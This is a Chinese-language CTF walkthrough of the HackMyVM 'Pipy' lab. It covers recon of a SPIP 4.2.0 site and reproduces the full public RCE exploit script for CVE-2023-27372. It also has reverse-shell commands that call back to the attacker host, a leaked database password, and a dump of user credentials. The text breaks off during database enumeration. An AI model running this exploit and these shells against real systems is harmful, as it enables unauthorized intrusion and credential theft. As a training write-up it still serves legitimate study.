hmv[-_-]Pipy

Pipy

image-20240410120254533

信息搜集

端口扫描

nmap -sCV -p 1-65535 172.20.10.4
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 c0:f6:a1:6a:53:72:be:8d:c2:34:11:e7:e4:9c:94:75 (ECDSA)
|_  256 32:1c:f5:df:16:c7:c1:99:2c:d6:26:93:5a:43:57:59 (ED25519)
80/tcp open  http    Apache httpd 2.4.52 ((Ubuntu))
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Mi sitio SPIP
|_http-generator: SPIP 4.2.0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

目录扫描

feroxbuster -u http://172.20.10.4 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -d 2 -s 200 301 302
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.10.2
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://172.20.10.4
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 👌  Status Codes          │ [200, 301, 302]
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.10.2
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 2
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
200      GET        9l       14w      186c http://172.20.10.4/squelettes-dist/css/font.css
200      GET      612l     1862w    20633c http://172.20.10.4/plugins-dist/mediabox/lity/js/lity.mediabox.js
200      GET      586l     1191w     8967c http://172.20.10.4/squelettes-dist/css/typo.css
200      GET       36l       85w     1272c http://172.20.10.4/prive/spip_pass.html
200      GET      156l      455w     3750c http://172.20.10.4/prive/paquet.dtd
200      GET      196l     1309w    11775c http://172.20.10.4/prive/xhtml-lat1.ent
200      GET        1l       13w      141c http://172.20.10.4/prive/informer_auteur.html
200      GET        0l        0w        0c http://172.20.10.4/prive/informer_auteur_fonctions.php
301      GET        9l       28w      310c http://172.20.10.4/local => http://172.20.10.4/local/
200      GET        4l       23w      187c http://172.20.10.4/local/CACHEDIR.TAG
200      GET        3l       13w       83c http://172.20.10.4/local/remove.txt
200      GET        1l        7w      436c http://172.20.10.4/local/config.txt
301      GET        9l       28w      315c http://172.20.10.4/javascript => http://172.20.10.4/javascript/
301      GET        9l       28w      311c http://172.20.10.4/vendor => http://172.20.10.4/vendor/
301      GET        9l       28w      311c http://172.20.10.4/config => http://172.20.10.4/config/
200      GET        0l        0w        0c http://172.20.10.4/vendor/autoload.php
200      GET        0l        0w        0c http://172.20.10.4/config/connect.php
200      GET        0l        0w        0c http://172.20.10.4/config/ecran_securite.php
200      GET        3l       13w       83c http://172.20.10.4/config/remove.txt
301      GET        9l       28w      308c http://172.20.10.4/tmp => http://172.20.10.4/tmp/
200      GET        0l        0w        0c http://172.20.10.4/tmp/cron.lock
200      GET        1l        2w       14c http://172.20.10.4/tmp/meta_cache.php
200      GET      674l     5644w    35147c http://172.20.10.4/LICENSE
200      GET        1l        1w       33c http://172.20.10.4/tmp/menu-rubriques-cache.txt
200      GET       84l      455w    35410c http://172.20.10.4/tmp/plugin_xml_cache.gz
200      GET        4l       23w      187c http://172.20.10.4/tmp/CACHEDIR.TAG
200      GET       56l      146w     1491c http://172.20.10.4/prive/javascript/jquery.autosave.js
200      GET      140l      202w     1497c http://172.20.10.4/squelettes-dist/css/reset.css
301      GET        9l       28w      308c http://172.20.10.4/IMG => http://172.20.10.4/IMG/
200      GET        3l       13w       80c http://172.20.10.4/IMG/remove.txt
200      GET       39l      134w     1189c http://172.20.10.4/squelettes-dist/css/form.css
200      GET      101l      210w     1667c http://172.20.10.4/squelettes-dist/css/clear.css
200      GET       93l      400w     3103c http://172.20.10.4/squelettes-dist/css/layout.css
200      GET      880l     3034w    28519c http://172.20.10.4/plugins-dist/porte_plume/javascript/jquery.markitup_pour_spip.js
200      GET      590l     1269w    16249c http://172.20.10.4/plugins-dist/mediabox/lib/lity/lity.js
200      GET     1162l     4111w    38533c http://172.20.10.4/prive/javascript/ajaxCallback.js
200      GET      256l      892w     8312c http://172.20.10.4/plugins-dist/mediabox/javascript/spip.mediabox.js
200      GET     1549l     5417w    42242c http://172.20.10.4/prive/javascript/jquery.form.js
200      GET      705l     1688w    22638c http://172.20.10.4/local/cache-js/jsdyn-javascript_porte_plume_start_js-cffe9b6f.js
200      GET      206l      419w     4438c http://172.20.10.4/plugins-dist/mediabox/lity/css/lity.mediabox.css
200      GET      168l      415w     5494c http://172.20.10.4/plugins-dist/porte_plume/javascript/jquery.previsu_spip.js
200      GET      340l     1179w    10765c http://172.20.10.4/squelettes-dist/css/theme.css
200      GET       61l      102w     1565c http://172.20.10.4/prive/javascript/jquery.placeholder-label.js
200      GET       96l      238w     1662c http://172.20.10.4/squelettes-dist/css/media.css
200      GET       59l      166w     5368c http://172.20.10.4/local/cache-css/cssdyn-css_barre_outils_icones_css-8362435d.css
200      GET      209l      443w     3798c http://172.20.10.4/plugins-dist/mediabox/lib/lity/lity.css
200      GET      395l      945w     7784c http://172.20.10.4/plugins-dist/porte_plume/css/barre_outils.css
200      GET      126l      461w     7518c http://172.20.10.4/spip.php
200      GET      163l      316w     2849c http://172.20.10.4/plugins-dist/mediabox/lity/skins/_simple-dark/lity.css
200      GET      107l      232w     2093c http://172.20.10.4/squelettes-dist/css/links.css
200      GET      212l      925w     7638c http://172.20.10.4/squelettes-dist/css/spip.css
200      GET        1l        5w      120c http://172.20.10.4/squelettes-dist/puce.gif
200      GET       26l       45w     1389c http://172.20.10.4/squelettes-dist/rss_forum_syndic.html
200      GET       30l       42w     1012c http://172.20.10.4/squelettes-dist/ical.html
200      GET       24l       38w      739c http://172.20.10.4/squelettes-dist/calendrier.html
200      GET      124l      248w     3867c http://172.20.10.4/squelettes-dist/recherche.html
200      GET       78l      179w     3100c http://172.20.10.4/squelettes-dist/backend-breves.html
200      GET       86l      205w     3378c http://172.20.10.4/squelettes-dist/article.html
200      GET       16l       22w      322c http://172.20.10.4/squelettes-dist/paquet.xml
200      GET       53l      118w     2233c http://172.20.10.4/squelettes-dist/forum.html
200      GET       55l      139w     2334c http://172.20.10.4/squelettes-dist/inc-rss-item.html
200      GET       26l       45w     1385c http://172.20.10.4/squelettes-dist/rss_forum_breve.html
200      GET    10993l    45090w   293671c http://172.20.10.4/prive/javascript/jquery.js
200      GET      147l      465w     4150c http://172.20.10.4/prive/javascript/js.cookie.js
200      GET      126l      461w     7514c http://172.20.10.4/
200      GET      237l     1744w    13848c http://172.20.10.4/prive/xhtml-symbol.ent
200      GET       66l      488w     3660c http://172.20.10.4/prive/spip_style.css
200      GET       15l       46w      439c http://172.20.10.4/prive/spip_style_print.css
200      GET       14l       49w      556c http://172.20.10.4/prive/style_prive.css.html
200      GET       43l      100w     1615c http://172.20.10.4/prive/login.html
200      GET       80l      527w     4131c http://172.20.10.4/prive/xhtml-special.ent
200      GET        0l        0w        0c http://172.20.10.4/prive/ajax_selecteur_fonctions.php
200      GET        8l       12w      220c http://172.20.10.4/prive/ajax_item_pick.html
200      GET        0l        0w        0c http://172.20.10.4/prive/ajax_item_pick_fonctions.php
200      GET      371l     1466w    13268c http://172.20.10.4/prive/spip_admin.css
200      GET        8l       12w      199c http://172.20.10.4/prive/ajax_selecteur.html
200      GET      122l      211w     5910c http://172.20.10.4/prive/ical_prive.html
200      GET        0l        0w        0c http://172.20.10.4/config/chmod.php
200      GET        1l        2w       14c http://172.20.10.4/config/cles.php
200      GET        1l        1w       10c http://172.20.10.4/tmp/job_queue_next.txt
200      GET        3l       13w       83c http://172.20.10.4/tmp/remove.txt
200      GET       36l       67w     1504c http://172.20.10.4/squelettes-dist/backend.html
200      GET        2l        3w       97c http://172.20.10.4/squelettes-dist/favicon.ico.html
200      GET       21l      121w      807c http://172.20.10.4/squelettes-dist/CHANGELOG.md
200      GET       76l      133w     2297c http://172.20.10.4/squelettes-dist/sommaire.html
200      GET       26l       45w     1397c http://172.20.10.4/squelettes-dist/rss_forum_rubrique.html
200      GET      120l      321w     3558c http://172.20.10.4/squelettes-dist/backend.xslt.html
200      GET       34l       80w     1345c http://172.20.10.4/squelettes-dist/identifiants.html
200      GET       98l      222w     3475c http://172.20.10.4/squelettes-dist/site.html
200      GET        1l        3w      130c http://172.20.10.4/squelettes-dist/puce_rtl.gif
200      GET       41l       65w     1235c http://172.20.10.4/squelettes-dist/contact.html
200      GET       26l       45w     1422c http://172.20.10.4/squelettes-dist/rss_forum_article.html
200      GET      145l      320w     4758c http://172.20.10.4/squelettes-dist/mot.html
200      GET       48l       89w     1894c http://172.20.10.4/squelettes-dist/404.html
200      GET       26l       46w     1414c http://172.20.10.4/squelettes-dist/rss_forum_thread.html
200      GET       85l      202w     3092c http://172.20.10.4/squelettes-dist/breve.html
200      GET      161l      349w     5459c http://172.20.10.4/squelettes-dist/rubrique.html
200      GET       61l      166w     1975c http://172.20.10.4/squelettes-dist/sitemap.xml.html
200      GET       82l      160w     2616c http://172.20.10.4/squelettes-dist/auteur.html
200      GET       40l       64w     1171c http://172.20.10.4/squelettes-dist/plan.html
200      GET       37l       44w      868c http://172.20.10.4/squelettes-dist/nouveautes.html
200      GET        1l       27w     9052c http://172.20.10.4/squelettes-dist/spip.ico
200      GET       24l       47w      536c http://172.20.10.4/squelettes-dist/robots.txt.html
301      GET        9l       28w      311c http://172.20.10.4/ecrire => http://172.20.10.4/ecrire/
301      GET        9l       28w      315c http://172.20.10.4/ecrire/xml => http://172.20.10.4/ecrire/xml/
301      GET        9l       28w      319c http://172.20.10.4/ecrire/plugins => http://172.20.10.4/ecrire/plugins/
301      GET        9l       28w      318c http://172.20.10.4/ecrire/public => http://172.20.10.4/ecrire/public/
301      GET        9l       28w      318c http://172.20.10.4/ecrire/action => http://172.20.10.4/ecrire/action/
301      GET        9l       28w      319c http://172.20.10.4/ecrire/install => http://172.20.10.4/ecrire/install/
301      GET        9l       28w      315c http://172.20.10.4/ecrire/src => http://172.20.10.4/ecrire/src/
301      GET        9l       28w      316c http://172.20.10.4/ecrire/lang => http://172.20.10.4/ecrire/lang/
301      GET        9l       28w      316c http://172.20.10.4/ecrire/exec => http://172.20.10.4/ecrire/exec/
301      GET        9l       28w      316c http://172.20.10.4/ecrire/base => http://172.20.10.4/ecrire/base/
301      GET        9l       28w      315c http://172.20.10.4/ecrire/inc => http://172.20.10.4/ecrire/inc/
301      GET        9l       28w      316c http://172.20.10.4/ecrire/auth => http://172.20.10.4/ecrire/auth/
301      GET        9l       28w      325c http://172.20.10.4/ecrire/notifications => http://172.20.10.4/ecrire/notifications/
301      GET        9l       28w      316c http://172.20.10.4/ecrire/urls => http://172.20.10.4/ecrire/urls/
301      GET        9l       28w      315c http://172.20.10.4/ecrire/req => http://172.20.10.4/ecrire/req/
301      GET        9l       28w      310c http://172.20.10.4/prive => http://172.20.10.4/prive/
301      GET        9l       28w      317c http://172.20.10.4/ecrire/genie => http://172.20.10.4/ecrire/genie/
301      GET        9l       28w      322c http://172.20.10.4/javascript/jquery => http://172.20.10.4/javascript/jquery/
[###################>] - 4m    645730/661832  0s      found:121     errors:0      
[####################] - 4m    661832/661832  0s      found:121     errors:0      
[####################] - 4m    220546/220546  893/s   http://172.20.10.4/ 
[####################] - 4s    220546/220546  54002/s http://172.20.10.4/plugins-dist/ => Directory listing
[####################] - 5s    220546/220546  47872/s http://172.20.10.4/prive/ => Directory listing
[####################] - 4s    220546/220546  56133/s http://172.20.10.4/local/ => Directory listing
[####################] - 4m    220546/220546  870/s   http://172.20.10.4/javascript/ 
[####################] - 5s    220546/220546  48123/s http://172.20.10.4/vendor/ => Directory listing
[####################] - 5s    220546/220546  47614/s http://172.20.10.4/config/ => Directory listing
[####################] - 5s    220546/220546  44367/s http://172.20.10.4/tmp/ => Directory listing
[####################] - 0s    220546/220546  27568250/s http://172.20.10.4/IMG/ => Directory listing
[####################] - 4s    220546/220546  56305/s http://172.20.10.4/squelettes-dist/ => Directory listing
[####################] - 4m    220546/220546  894/s   http://172.20.10.4/ecrire/

漏洞扫描

nikto -h http://172.20.10.4
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          172.20.10.4
+ Target Hostname:    172.20.10.4
+ Target Port:        80
+ Start Time:         2024-04-10 00:05:09 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.52 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: Uncommon header 'composed-by' found, with contents: SPIP 4.2.0 @ www.spip.net + http://172.20.10.4/local/config.txt.
+ /: Uncommon header 'x-spip-cache' found, with contents: 86400.
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.52 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /config/: Directory indexing found.
+ /config/: Configuration information may be available remotely.
+ /tmp/: Directory indexing found.
+ /tmp/: This might be interesting.
+ /htaccess.txt: Default Joomla! htaccess.txt file found. This should be removed or renamed.
+ /composer.json: PHP Composer configuration file reveals configuration information. See: https://getcomposer.org/
+ /composer.lock: PHP Composer configuration file reveals configuration information. See: https://getcomposer.org/
+ /README.md: Readme Found.
+ 8102 requests: 0 error(s) and 14 item(s) reported on remote host
+ End Time:           2024-04-10 00:05:34 (GMT-4) (25 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

配置查看

whatweb 172.20.10.4
http://172.20.10.4 [200 OK] Apache[2.4.52], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.52 (Ubuntu)], IP[172.20.10.4], JQuery, MetaGenerator[SPIP 4.2.0], SPIP[4.2.0][http://172.20.10.4/local/config.txt], Script[text/javascript], Title[Mi sitio SPIP], UncommonHeaders[composed-by,x-spip-cache]

image-20240410120633650

image-20240410120719450

漏洞利用

查看敏感目录

image-20240410120945440

http://172.20.10.4/config/remove.txt
Vous pouvez effacer ce fichier sans dommages.
You can safely remove this file.

image-20240410121133066

http://172.20.10.4/tmp/job_queue_next.txt
1712729014
http://172.20.10.4/tmp/log/mysql.log
......
2023-10-03 15:42:58 192.168.0.101 (pid 4802) :Pri:HS: Echec mysqli_connect. Erreur : Access denied for user 'spipuser'@'localhost' (using password: YES)
2023-10-03 15:43:53 192.168.0.101 (pid 4742) :Pri:HS: Echec mysqli_connect. Erreur : Access denied for user 'admin'@'localhost' (using password: NO)
......

其实东西有很多,但是发现觉得有用的比较少,慢慢看:

http://172.20.10.4/tmp/cache/spip_versions_list.json
{
  "api": 2,
  "versions": {
    "dev": "spip/dev/spip-master.zip",
    "4.2.11": "spip/archives/spip-v4.2.11.zip",
    "4.1.15": "spip/archives/spip-v4.1.15.zip",
    "4.0.11": "spip/archives/spip-v4.0.11.zip",
    "3.2.19": "spip/archives/spip-v3.2.19.zip"
  },
  "default_branch": "4.2",
  "requirements": {
    "php": {
      "master": "8.1.0",
      "4.2": "7.4.0",
      "4.1": "7.4.0",
      "4.0": "7.3.0",
      "3.2": "5.4.0"
    }
  }
}
http://172.20.10.4/tmp/CACHEDIR.TAG
Signature: 8a477f597d28d172789f06886806bc55
# This file is a cache directory tag created by SPIP.
# For information about cache directory tags, see:
#   http://www.brynosaurus.com/cachedir/

甚至还有压缩包,但是里面没有什么有价值的信息,基本是配置信息。

还找到了登录页面:

http://172.20.10.4/spip.php

image-20240410122238643

其他的我似乎没有发现比较有价值的,先尝试进行简单的弱密码和万能密码,然后尝试进行sql注入:

image-20240410122501293

尝试sql注入:

POST /spip.php?page=login&url=%2Fecrire%2F&lang=fr HTTP/1.1
Host: 172.20.10.4
Content-Length: 265
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://172.20.10.4
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://172.20.10.4/spip.php?page=login&url=%2Fecrire%2F&lang=fr
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

page=login&url=%2Fecrire%2F&lang=fr&formulaire_action=login&formulaire_action_args=gYHWt7rAiJ9zrPAiAI6XQl5eYzZa62dsPenl8w0EiILo%2BAbt%2B4GWnfiRsFbKvBojvnPYjDzo%2FzQ0ghyTk3tUUn0xV1PZs03PSYbSQKSgN5MjbMjTVA%3D%3D&formulaire_action_sign=&var_login=admin&password=123456

image-20240410123718448

似乎不太阔以,尝试忘记密码:

http://172.20.10.4/spip.php?page=spip_pass

image-20240410122554387

尝试LFI:

image-20240410122639687

查找漏洞

挨个查找是否存在历史漏洞:

image-20240410122737944

靶机创立时间在2023-10-18,寻找在此之前的漏洞:

CMS

image-20240410122930574

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

# Exploit Title: SPIP v4.2.1 - Remote Code Execution (Unauthenticated)
# Google Dork: inurl:"/spip.php?page=login"
# Date: 19/06/2023    时间上在靶场出来接近半年前了,应该是这个!
# Exploit Author: nuts7 (https://github.com/nuts7/CVE-2023-27372)
# Vendor Homepage: https://www.spip.net/
# Software Link: https://files.spip.net/spip/archives/
# Version: < 4.2.1 (Except few fixed versions indicated in the description)
# Tested on: Ubuntu 20.04.3 LTS, SPIP 4.0.0
# CVE reference : CVE-2023-27372 (coiffeur)
# CVSS : 9.8 (Critical)
#
# Vulnerability Description:
#
# SPIP before 4.2.1 allows Remote Code Execution via form values in the public area because serialization is mishandled. Branches 3.2, 4.0, 4.1 and 4.2 are concerned. The fixed versions are 3.2.18, 4.0.10, 4.1.8, and 4.2.1.
# This PoC exploits a PHP code injection in SPIP. The vulnerability exists in the `oubli` parameter and allows an unauthenticated user to execute arbitrary commands with web user privileges.
#
# Usage: python3 CVE-2023-27372.py http://example.com

import argparse
import bs4
import html
import requests

def parseArgs():
    parser = argparse.ArgumentParser(description="Poc of CVE-2023-27372 SPIP < 4.2.1 - Remote Code Execution by nuts7")
    parser.add_argument("-u", "--url", default=None, required=True, help="SPIP application base URL")
    parser.add_argument("-c", "--command", default=None, required=True, help="Command to execute")
    parser.add_argument("-v", "--verbose", default=False, action="store_true", help="Verbose mode. (default: False)")
    return parser.parse_args()

def get_anticsrf(url):
    r = requests.get('%s/spip.php?page=spip_pass' % url, timeout=10)
    soup = bs4.BeautifulSoup(r.text, 'html.parser')
    csrf_input = soup.find('input', {'name': 'formulaire_action_args'})
    if csrf_input:
        csrf_value = csrf_input['value']
        if options.verbose:
            print("[+] Anti-CSRF token found : %s" % csrf_value)
        return csrf_value
    else:
        print("[-] Unable to find Anti-CSRF token")
        return -1

def send_payload(url, payload):
    data = {
        "page": "spip_pass",
        "formulaire_action": "oubli",
        "formulaire_action_args": csrf,
        "oubli": payload
    }
    r = requests.post('%s/spip.php?page=spip_pass' % url, data=data)
    if options.verbose:
        print("[+] Execute this payload : %s" % payload)
    return 0

if __name__ == '__main__':
    options = parseArgs()

    requests.packages.urllib3.disable_warnings()
    requests.packages.urllib3.util.ssl_.DEFAULT_CIPHERS += ':HIGH:!DH:!aNULL'
    try:
        requests.packages.urllib3.contrib.pyopenssl.util.ssl_.DEFAULT_CIPHERS += ':HIGH:!DH:!aNULL'
    except AttributeError:
        pass

    csrf = get_anticsrf(url=options.url)
    send_payload(url=options.url, payload="s:%s:\"<?php system('%s'); ?>\";" % (20 + len(options.command), options.command))

尝试利用一下:

# kali1
echo 'bash -c "exec bash -i &>/dev/tcp/172.20.10.8/1234 <&1"' > revershell.sh
python3 -m http.server 2345
# kali2
nc -lvnp 1234
# kali3
python3 51536.py -u http://172.20.10.4 -c 'wget http://172.20.10.8:2345/revershell.sh'
python3 51536.py -u http://172.20.10.4 -c 'bash revershell.sh'

image-20240410124842473

(我比较乱,随便搞的,和上面描述的不一样)

提权

信息搜集

(remote) www-data@pipy:/var/www/html$ ls
CHANGELOG.md  LICENSE    SECURITY.md    composer.lock  ecrire        index.php  plugins-dist       prive          spip.php  spip.svg         tmp
IMG           README.md  composer.json  config         htaccess.txt  local      plugins-dist.json  revershell.sh  spip.png  squelettes-dist  vendor
(remote) www-data@pipy:/var/www/html$ cat config
cat: config: Is a directory
(remote) www-data@pipy:/var/www/html$ ls -F 
CHANGELOG.md  LICENSE    SECURITY.md    composer.lock  ecrire/       index.php  plugins-dist/      prive/         spip.php  spip.svg          tmp/
IMG/          README.md  composer.json  config/        htaccess.txt  local/     plugins-dist.json  revershell.sh  spip.png  squelettes-dist/  vendor/
(remote) www-data@pipy:/var/www/html$ cd config
(remote) www-data@pipy:/var/www/html/config$ ls
chmod.php  cles.php  connect.php  ecran_securite.php  remove.txt
(remote) www-data@pipy:/var/www/html/config$ cd ../   
(remote) www-data@pipy:/var/www/html$ cat SECURITY.md 
# Security Policy

## Signaler une faille de sécurité

Voir https://www.spip.net/fr_article6688.html

## Reporting a Vulnerability

See https://www.spip.net/en_article6689.html(remote) www-data@pipy:/var/www/html$ cd ../
(remote) www-data@pipy:/var/www$ ls -la
total 20
drwxr-xr-x  4 www-data www-data 4096 Oct  5  2023 .
drwxr-xr-x 14 root     root     4096 Oct  2  2023 ..
-rw-------  1 www-data www-data  130 Oct  5  2023 .bash_history
drwxrwxrwx  3 www-data www-data 4096 Oct  5  2023 .local
drwxr-xr-x 11 www-data www-data 4096 Apr 10 04:46 html
(remote) www-data@pipy:/var/www$ history .bash_history 
bash: history: .bash_history: numeric argument required
(remote) www-data@pipy:/var/www$ cat .bash_history 
whoami
exit
exit
reset xterm
export TERM=xterm-256color
stty rows 51 cols 197
ls
nano
ls
cat config/connect.php
mysql -u root -p 
(remote) www-data@pipy:/var/www$ cd html
(remote) www-data@pipy:/var/www/html$ ls -la
total 160
drwxr-xr-x 11 www-data www-data  4096 Apr 10 04:46 .
drwxr-xr-x  4 www-data www-data  4096 Oct  5  2023 ..
-rw-r--r--  1 www-data www-data  7045 Feb 23  2023 CHANGELOG.md
drwxr-xr-x  2 www-data www-data  4096 Oct  3  2023 IMG
-rw-r--r--  1 www-data www-data 35147 Feb 23  2023 LICENSE
-rw-r--r--  1 www-data www-data   842 Feb 23  2023 README.md
-rw-r--r--  1 www-data www-data   178 Feb 23  2023 SECURITY.md
-rw-r--r--  1 www-data www-data  1761 Feb 23  2023 composer.json
-rw-r--r--  1 www-data www-data 27346 Feb 23  2023 composer.lock
drwxr-xr-x  2 www-data www-data  4096 Oct  3  2023 config
drwxr-xr-x 22 www-data www-data  4096 Oct  3  2023 ecrire
-rw-r--r--  1 www-data www-data  4307 Feb 23  2023 htaccess.txt
-rw-r--r--  1 www-data www-data    42 Feb 23  2023 index.php
drwxr-xr-x  5 www-data www-data  4096 Oct  3  2023 local
drwxr-xr-x 22 www-data www-data  4096 Oct  3  2023 plugins-dist
-rw-r--r--  1 www-data www-data  3645 Feb 23  2023 plugins-dist.json
drwxr-xr-x 12 www-data www-data  4096 Oct  3  2023 prive
-rw-rw-rw-  1 www-data www-data    55 Apr 10 04:43 revershell.sh
-rw-r--r--  1 www-data www-data   973 Feb 23  2023 spip.php
-rw-r--r--  1 www-data www-data  1212 Feb 23  2023 spip.png
-rw-r--r--  1 www-data www-data  1673 Feb 23  2023 spip.svg
drwxr-xr-x 10 www-data www-data  4096 Oct  3  2023 squelettes-dist
drwxr-xr-x  5 www-data www-data  4096 Apr 10 04:04 tmp
drwxr-xr-x  6 www-data www-data  4096 Oct  3  2023 vendor
(remote) www-data@pipy:/var/www/html$ cd config/
(remote) www-data@pipy:/var/www/html/config$ ls -la
total 48
drwxr-xr-x  2 www-data www-data  4096 Oct  3  2023 .
drwxr-xr-x 11 www-data www-data  4096 Apr 10 04:46 ..
-rw-rw-rw-  1 www-data www-data   197 Oct  3  2023 .htaccess
-rw-rw-rw-  1 www-data www-data     0 Oct  3  2023 .ok
-rw-rw-rw-  1 www-data www-data   109 Oct  3  2023 chmod.php
-rw-rw-rw-  1 www-data www-data   163 Oct  3  2023 cles.php
-rw-rw-rw-  1 www-data www-data   243 Oct  3  2023 connect.php
-rw-r--r--  1 www-data www-data 17240 Feb 23  2023 ecran_securite.php
-rw-r--r--  1 www-data www-data    83 Feb 23  2023 remove.txt
(remote) www-data@pipy:/var/www/html/config$ cat connect.php 
<?php
if (!defined("_ECRIRE_INC_VERSION")) return;
defined('_MYSQL_SET_SQL_MODE') || define('_MYSQL_SET_SQL_MODE',true);
$GLOBALS['spip_connect_version'] = 0.8;
spip_connect_db('localhost','','root','dbpassword','spip','mysql', 'spip','','');

看到历史记录突然一个激灵,杀了个回马枪,hhh,差点错过。

root
dbpassword

查询数据库

尝试连接数据库,如果是直接nc的可能需要稳定一下数据库,见最下方:

(remote) www-data@pipy:/var/www/html/config$ mysql -u root -p
Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 1548
Server version: 10.6.12-MariaDB-0ubuntu0.22.04.1 Ubuntu 22.04

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| spip               |
| sys                |
+--------------------+
5 rows in set (0.027 sec)

MariaDB [(none)]> use spip;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [spip]> show tables;
+-------------------------+
| Tables_in_spip          |
+-------------------------+
| spip_articles           |
| spip_auteurs            |
| spip_auteurs_liens      |
| spip_depots             |
| spip_depots_plugins     |
| spip_documents          |
| spip_documents_liens    |
| spip_forum              |
| spip_groupes_mots       |
| spip_jobs               |
| spip_jobs_liens         |
| spip_meta               |
| spip_mots               |
| spip_mots_liens         |
| spip_paquets            |
| spip_plugins            |
| spip_referers           |
| spip_referers_articles  |
| spip_resultats          |
| spip_rubriques          |
| spip_syndic             |
| spip_syndic_articles    |
| spip_types_documents    |
| spip_urls               |
| spip_versions           |
| spip_versions_fragments |
| spip_visites            |
| spip_visites_articles   |
+-------------------------+
28 rows in set (0.001 sec)

MariaDB [spip]> select * from spip_auteurs;
+-----------+--------+-----+-----------------+----------+----------+--------+-----------------------------------------------+-----------+---------------------+-----+--------+---------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| id_auteur | nom    | bio | email           | nom_site | url_site | login  | pass                                 tatut    | webmestre | maj                 | pgp | htpass | en_ligne            | alea_actuel                       prefs                                                                                                                                                                                                                                cles                                                                                                                                                                                                                             |
+-----------+--------+-----+-----------------+----------+----------+--------+-----------------------------------------------+-----------+---------------------+-----+--------+---------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
|         1 | Angela |     | angela@pipy.htb |          |          | angela | 4ng3l4                               minirezo | oui       | 2023-10-04 17:28:39 |     |        | 2023-10-04 13:50:34 | 387046876651c39a45bc836.13502903  a:4:{s:7:"couleur";i:2;s:7:"display";i:2;s:18:"display_navigation";s:22:"navigation_avec_icones";s:3:"cnx";s:0:"";                                                                                                                   jg+hKOjCODrOTwhvDGXqQ34zRxFmdchyPL7wVRW3zsPwE6+4q0GlAPo4b4OGRmzvR6NNFdEjARDtoeIAxH88cQZt2H3ENUggrz99vFfCmWHIdJgSDSOc0fCXOCxzCW9NwvzJYM/u/8cWGGdRALd7fzFYhOY6DmokVnIlwauc8/lwRyNbam1H6+g5ju57cI8Dzll+pCMUPhhti9RvC3WNzC2IUcPnHEM= |
|         2 | admin  |     | admin@pipy.htb  |          |          | admin  | $2y$10$UU8xkGHmmSzrF6elpQWjmeXooyfzHBcomite   | non       | 2024-04-10 04:37:08 |     |        | 2023-10-04 17:31:03 | 56364180666161774c5fff8.85980786  a:4:{s:7:"couleur";i:2;s:7:"display";i:2;s:18:"display_navigation";s:22:"navigation_avec_icones";s:3:"cnx";s:0:"";FPNzl4/wAh9i0D1bqfjYKMJSG63z4KPzonGgNUHz+NmYNLbcIM83Tilz5NYrlGKbw4/cDDBE1mXohDXwEDagYuW2kAUYeqd8y5XqDogNsLGEJIzn0o=                                                                                                                                                                                                                                 |
+-----------+--------+-----+-----------------+----------+----------+--------+-----------------------------------------------+-----------+---------------------+-----+--------+---------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
2 rows in set (0.000 sec)

啊这,估计是太长了,尝试减少一下:

MariaDB [spip]> show columns from spip_auteurs;
+--------------+--------------+------+-----+---------------------+-------------------------------+
| Field        | Type         | Null | Key | Default             | Extra                         |
+--------------+--------------+------+-----+---------------------+-------------------------------+
| id_auteur    | bigint(21)   | NO   | PRI | NULL                | auto_increment                |
